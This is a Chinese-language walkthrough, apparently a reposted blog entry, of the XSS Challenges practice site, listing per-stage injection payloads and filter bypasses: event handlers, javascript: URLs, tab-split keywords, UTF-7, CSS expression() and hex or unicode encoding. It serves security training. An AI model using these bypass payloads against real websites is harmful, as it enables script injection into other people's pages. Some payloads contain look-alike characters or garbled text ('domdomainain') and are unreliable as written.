概述:

https://xss-quiz.int21h.jp/

Stage #1

payload: <script>alert(document.domain);</script>

Stage #2

http://xss-quiz.int21h.jp/stage2.php?sid=e93e71eed43c3ab5668af6a5aa603cf66eedce70

尝试: <script>alert(document.domain);</script> 未果

input 没有闭合

payload: "><svg οnlοad=alert(document.domain)>

Stage #3

http://xss-quiz.int21h.jp/stage-3.php?sid=d362dd49b96c30f3e9a4a6ea0abafb0cef59ed2d

备注:这里因为都是post请求,p1 变量是不存在跨站的,p2变量才存在问题,因此需要抓包

;javascript:alert(document.domain);//

p2=<script>alert(document.domain);</script>

Stage #4

http://xss-quiz.int21h.jp/stage_4.php?sid=d47663090ecc0b8d55ae73ee3753ead52c63103e

p3 为隐藏的属性,使用inspector删除掉text=hidden

payload:"><svg οnlοad=alert(document.domain)>;

Stage #5

http://xss-quiz.int21h.jp/stage–5.php?sid=e9dd07b6e86c5314a2e574e887faa9482de330bf

通过尝试发现,闭合即可

<input type="text" name="p1" maxlength="15" size="30" value="hack404">

但是由于前端对字符数量做了限制,因此抓包修改绕过

Stage #6

http://xss-quiz.int21h.jp/stage-no6.php?sid=b76ebfa651652f2c22f8ddbe264941287667706c

问题点:对< > 做了转移,利用事件进行绕过

<input type="text" name="p1" size="50" value="" οnmοuseοver=alert(document.domain);//">

payload:

" οnmοuseοver=alert(document.domain);//

123" οnmοuseοver="alert(document.domain);

<input type="text" name="p1" size="50" value="123" οnmοuseοver="alert(document.domain);">

Stage #7

http://xss-quiz.int21h.jp/stage07.php?sid=f433ab35e367d5a94100aa4e0f694c3e63d67105

<input type="text" name="p1" size="50" value=&lt;script&gt;alert(document.domain);&lt;/script&gt;>

<input type="text" name="p1" size="50" value=;οnmοuseοver=alert(document.domain);//>

对< > " ' 都已近做了转义

payload: view plaincopyprint  οnmοusemοve=alert(document.domain)

Stage #8

http://xss-quiz.int21h.jp/stage008.php?sid=4301b185b563c91208e0af232d7f016885e863e0

a 标签,插入,点击即可触发

<a href="javascript:alert(document.domain);">javascript:alert(document.domain);</a>

Stage #9

http://xss-quiz.int21h.jp/stage_09.php?sid=558484a712d793c446e3dc409601eaf126e73d25

此问题,目前的浏览器已经不支持,因为它依赖于对UTF-7的支持

Solution:+ACI- οnmοuseοver=+ACI-alert(document.domain)+ADsAIg- x=+ACI-
p1=1%2bACI- οnmοuseοver=%2bACI-alert(document.domain)%2bADsAIg-&charset=euc-jp

Stage #10

http://xss-quiz.int21h.jp/stage00010.php?sid=1b96f5c206c187751811fb9267a02c109c7e1276

<input type="text" name="p1" size="50" value=""><svg οnlοad=alert(document.)>">

看来是长字符限制了,我们尝试短的字符数尝试下

payload: " οnmοuseοver=alert(document.domdomainain); x="

<input type="text" name="p1" size="50" value="" οnmοuseοver=alert(document.domain); x="">

Stage #11

http://xss-quiz.int21h.jp/stage11th.php?sid=756e90d9a168c24e2abbc43d1f4409ce6ff70de3

这里主要是针对关键字,进行了混淆

"><a href="javascript:alert(document.domain);">hack404</a>

<input type="text" name="p1" size="50" value=""><a href="javaxscript:alert(document.domain);">hack404</a>">

这里我们使用特殊字符进行绕过:

%09           Horizontal tab

"><a href="javascr&#09ipt:alert(document.domain);">hack404</a>

<a href="javascr&#09ipt:alert(document.domain);">hack404</a>">

Stage #12

http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb

Passed with IE
Stage12: http://xss-quiz.int21h.jp/stage_no012.php?sid=188b00a4305c62ea415313484b57a9a3b59df5cb
Solution: "οnmοuseοver=alert(document.domain);

Stage #13

http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad

Passed with IE
Stage13: http://xss-quiz.int21h.jp/stage13_0.php?sid=49a2e48f78ade853ecd72a274e49102a9b096fad
Solution: xss:expression(alert(document.domain));"

Stage #14

http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8

Passed with IE
Stage14: http://xss-quiz.int21h.jp/stage-_-14.php?sid=cdfba63593b9c07d7b1b7e41790aa5de3ac4bcd8
Solution: xss:expre/**/ssion(alert(document.domain));"

Stage #15

http://xss-quiz.int21h.jp/stage__15.php?sid=26ac2a0522c04a788c217fd8d7847aab1626f726

hex encode :

< >

\x3c \x3e

payload:

\x3cscript\x3ealert(document.domain);\x3c/script\x3e

Stage #16

http://xss-quiz.int21h.jp/stage00000016.php?sid=67973758e07ac879612c31437a2e1fb283b760e7

unicode encoding < >

https://www.branah.com/unicode-converter

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Stage #17

http://xss-quiz.int21h.jp/stage-No17.php?sid=53342e06720dc7d4fa4224eb3c13bf966d823056

存在于老版本的IE

Stage #18

http://xss-quiz.int21h.jp/stage__No18.php?sid=170f1d30f88cf627174033ec5b73578276b94fc3

存在于老版本的IE

Stage #19

http://xss-quiz.int21h.jp/stage_–19.php?sid=787870a01e603b0c0d0d6c464c0595883e2c10ce

访问404了。。

参考:

https://blogs.tunelko.com/2013/12/02/xss-challenges/

https://github.com/matachi/MaTachi.github.io/blob/master/src/pages/solutions-to-the-wargame-xss-challenges-at-xss-quiz-int21h-jp.md

转载于:https://www.cnblogs.com/hack404/p/10736767.html

XSS Challenges xss-quiz.int21h.jp相关推荐

  1. XSS Challenges stage#1-10闯关详解

    XSS Challenges stage1-10闯关详解 文章目录 XSS Challenges stage1-10闯关详解 0x01 xss challenges 闯关环境准备 1.XSS chal ...

  2. 黑客之XSS注入练手:XSS Challenges通关指南

    本文目录: [TOC] 一.XSS Challenges介绍 靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 ...

  3. XSS Challenges

    一个xss练手的小平台   http://xss-quiz.int21h.jp/ 一共19关,每一关根据提示执行js :  alert(document.domian); 第一关 直接插入测试 < ...

  4. XSS Challenges闯关1-6

    第一关: 靶场链接:XSS Challenges (by yamagata21) - Stage #1 第一关截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert ...

  5. xss challenges闯关详细(6-10)

    XSS Challenges (by yamagata21) - Stage #1 目录 一.第六关 二.第七关 三.第八关 四.第九关 五.第十关 一.第六关 输入good man测试 回显位置,输 ...

  6. XSS学习笔记:XSS Challenges 1-19通关全详解

    前言 学习下XSS 主要是XSS Challenges 平台 共19关 模仿真实xss挖洞的情景,用浏览器中的f12中搜索,找出我们控制的代码所在的位置 思考那些个位置哪个或哪几个位置可以被注入我们想 ...

  7. XSS入门 XSS Challenges靶场搭建/前五关/基础教程

    前面写了很多XSS漏洞的利用,这一章开始重点在XSS漏洞的挖掘和如何注入script代码上,和sql注入相类似 目录 一.实验环境--XSS Challenges 二.探测XSS过程 第一关 第二关 ...

  8. XSS练习平台【XSS Challenges】

    以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈.这是一个模仿真实xss挖洞的情景,在X ...

  9. XSS平台 XSS挑战之旅 解题记录 writeup

    XSS平台 XSS挑战之旅 解题记录 writeup level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 le ...

最新文章

  1. JS将EXCEL文件导入前端第一行未出现或者出现F1F2F3的解决方法……
  2. python反射机制_详解python之反射机制
  3. hdu4081 最小树+DFS或者次小树的变形
  4. s7-300 第9讲 定时器
  5. 联想打印机7256显示更换墨盒_惠普打印机涉嫌垄断?只认自家“昂贵”墨盒,成本太高招架不住...
  6. Hive小文件问题:如何产生、造成影响、解放办法
  7. 如何用unit test测试controller_如何用电缆故障测试仪冲闪测试确定故障点?
  8. Java无所不能的反射在Android中需要熟练的知识
  9. customErrors与错误页面
  10. 2022 年第十二届 MathorCup 高校数学建模挑战赛C题解析
  11. 圣诞老人python代码_用Python画圣诞老人的N种方法
  12. 商品房价不会下跌的六大理由
  13. cpu 调频 温度 ondemand
  14. Plustoken重要操盘手已被遣返回国,警方正全力侦查
  15. android支付宝转跳转,APP跳转支付宝指定界面
  16. 怎么给PDF文档加页码,PDF文档加页码的方法
  17. 【K210】K210学习笔记七——使用K210拍摄照片并在MaixHub上进行训练
  18. 基于tabular包的Latex表格尺寸设置方法(列宽和行高)
  19. qq 4 android,Android QQ HD v5.5.4 正式版发布
  20. CentOS 7 源码安装 apache 及配置

热门文章

  1. 光是无限远服务器的花海,第21次云垂纵横计划服务器互通投票结果公告
  2. 单模光纤与多模光纤的区别
  3. LaTex 最狠的网站 嘎嘎狠
  4. 阿里云——云迁移中心
  5. hermit插值 matlab,埃尔米特(Hermite)插值及其MATLAB程序
  6. InfluxDB入门系列教程④ InfluxDB Studio可视化数据库管理工具
  7. 泰戈编程答案第一期(每周日更新)
  8. 打通零售新渠道,实现线上线下业务一体化
  9. “太上,不知有之;其次,亲而誉之;其次,畏之;其次,侮之。”
  10. 国产操作系统都有哪些功能?普通人能满足日常使用吗?